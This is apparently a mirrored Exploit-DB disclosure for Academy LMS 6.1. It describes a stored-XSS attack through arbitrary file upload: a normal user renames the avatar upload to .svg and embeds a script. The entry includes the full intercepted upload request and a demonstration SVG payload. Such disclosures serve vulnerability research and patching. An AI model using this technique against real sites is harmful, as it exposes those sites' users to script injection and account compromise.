Academy LMS 6.1 – Arbitrary File Upload

• Exploit Database
• 17 阅读

• 作者： CraCkEr
  日期： 2023-09-04
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51702/

• # Exploit Title: Academy LMS 6.1 - Arbitrary File Upload
  # Exploit Author: CraCkEr
  # Date: 05/08/2023
  # Vendor: Creativeitem
  # Vendor Homepage: https://academylms.net/
  # Software Link: https://demo.academylms.net/
  # Version: 6.1
  # Tested on: Windows 10 Pro
  # Impact: Allows User to upload files to the web server
  # CWE: CWE-79 - CWE-74 - CWE-707
  
  
  ## Description
  
  Allows Attacker to upload malicious files onto the server, such as Stored XSS
  
  
  ## Steps to Reproduce:
  
  1. Login as a [Normal User]
  2. In [User Dashboard], go to [Profile Settings] on this Path: https://website/dashboard/#/settings
  3. Upload any Image into the [avatar]
  4. Capture the POST Request with [Burp Proxy Intercept]
  5. Edit the file extension to .svg & inject your [Evil-Code] or [Stored XSS]
  
  -----------------------------------------------------------
  POST /wp-admin/async-upload.php HTTP/2
  
  -----------------------------------------------------------
  Content-Disposition: form-data; name="async-upload"; filename="ahacka.svg"
  Content-Type: image/svg+xml
  
  <?xml version="1.0" standalone="no"?>
  <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
  
  <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
  alert("XSS by CraCkEr");
  </script>
  </svg>
  -----------------------------------------------------------
  
  6. Send the Request
  7. Capture the GET request from [Burp Logger] to get the Path of your Uploaded [Stored-XSS]
  8. Access your Uploded Evil file on this Path: https://website/wp-content/uploads/***/**/*****.svg
  
  
  
  [-] Done